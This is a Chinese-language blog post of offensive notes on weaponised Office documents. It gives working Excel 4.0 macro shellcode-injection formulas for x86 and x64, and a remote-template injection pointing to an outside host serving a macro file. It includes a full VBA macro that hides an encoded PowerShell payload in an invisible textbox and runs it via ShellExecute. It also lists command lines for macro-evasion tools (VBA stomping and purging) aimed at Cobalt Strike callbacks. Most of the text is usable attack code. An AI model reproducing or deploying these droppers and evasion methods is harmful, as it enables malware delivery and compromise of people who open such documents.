Offensive Doc 笔记

禁止平庸!!!!


在团队内的分享,记录一下

一、XLM Macro(Excel 4.0)

与一般的office文档不同的是,其格式为XLM,不同于其他的XML,XLM被创建于1992年,比VBA还要早出很多。

0.png

demo:

0.png

这项技术在2018年,在这个文章中被指出:https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

由此也衍生出了很多的相关项目,比如(Excel4-DCOM:https://github.com/outflanknl/Excel4-DCOM):

1
Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin

其也是依靠XLM的来调用win32API来实现远程线程注入:

0.png

SharpShooter:https://github.com/mdsecactivebreach/SharpShooter 利用该工具创建XLS Macro的方法如下:

1
SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

生成的SLK文件如下:

0.png

原理基本类似。不过这种都是基于X86的,X64有一些问题,有一篇文章(https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits) 介绍了该问题。

0.png

最后衍生的工具:https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a

当然还有很多相关的工具(Macrome:https://github.com/michaelweber/Macrome、EXCELntDonut:https://github.com/FortyNorthSecurity/EXCELntDonut) 等等。

进程注入

在XLS中支持win32的调用,也就意味着我们可以进行进程注入等操作。调用方式如下:

1
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

0.png

需要注意的是,区分x86与x64,x86的demo如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()

x64demo如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()

这里方便起见直接使用EXCELntDonut来生成。使用Cs生成shellcode,然后替换到指定位置:

0.png

然后运行:

1
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

0.png

然后将数据插入,并处理

0.png

0.png

然后执行即可。可惜测试时一直失败。

0.png

Evasion

效果相等:

0.png

宏隐藏

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):

0.png

即改成02

0.png

此时已无法显示隐藏:

0.png

EPPLUS:EPPlus 5-Excel spreadsheets for .NET

EPPLUS是一个用来生成Excel的.net库。https://github.com/EPPlusSoftware/EPPlus

利用该程序可以更改的免杀excel,demo:https://github.com/FortyNorthSecurity/hot-manchego

用法:

1
2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt

执行宏,获取Cs会话。

0.png

二、powerpoint

这种攻击则利用的是鼠标轨迹来进行操作,比如鼠标点击、鼠标移动等。操作如下:

0.png

插入Cs生成的hta文件。点击时,

0.png

Cs上线。

三,远程加载文档

每一个文档都是一个zip文件,解压,编辑

0.png

修改为:

1
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

0.png

此时打开文档,运行宏即可上线。

四,控件

直接上代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub

Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String

payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="


zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""

secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
.TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
.Name = "Shell.Application"
.Height = 1
.Width = 1
.Visible = msoFalse
.Shadow.Visible = True
.Shadow.ForeColor.RGB = secretkey
If .Shadow.ForeColor.RGB <> secretkey Then
Debug.Print "Fail to set secret key"
End If
Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
.AlternativeText = "ShellExecute"
.TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub

Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
Set objCmdShape = ActiveDocument.Shapes(x)
If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
Debug.Print "Discovered Command Text Object"
cmdType = objCmdShape.Name
cmdCommand = objCmdShape.AlternativeText
cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
Debug.Print "Command Type To Execute: " & cmdType
Debug.Print "Command To Execute: " & cmdCommand
Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
Set cmdObj = Interaction.CreateObject(cmdType)
VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
objCmdShape.Delete
ActiveDocument.Save
Exit For
End If
Next
End Sub

没啥好手的就是利用控件去执行指定的程序。

五,VBA Stomping

直译过来就是VBA重踏。怎么去理解这个东西呢,比如说我们创建一个基础的VBA代码:

0.png

当我们解压该文档,并将其使用0填充时,依旧可以去执行,就行下面这样:

0.png

改为:

0.png

此时仍然可以使用。

武器化:https://github.com/outflanknl/EvilClippy

编译命令:

1
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

0.png

使用:

1
2
EvilClippy.exe -s fakecode.vba macrofile.doc
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

六,VBA Purging

武器化:https://github.com/fireeye/OfficePurge

1
2
3
4
OfficePurge.exe -d word -f .\malicious.doc -m NewMacros
OfficePurge.exe -d excel -f .\payroll.xls -m Module1
OfficePurge.exe -d publisher -f .\donuts.pub -m ThisDocument
OfficePurge.exe -d word -f .\malicious.doc -l

本文标题:Offensive Doc 笔记

文章作者:冷逸

发布时间:2021年01月31日 - 15:01

最后更新:2021年01月31日 - 15:01

原始链接:https://lengjibo.github.io/offendoc/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------The End-------------
坚持原创技术分享,您的支持将鼓励我继续创作!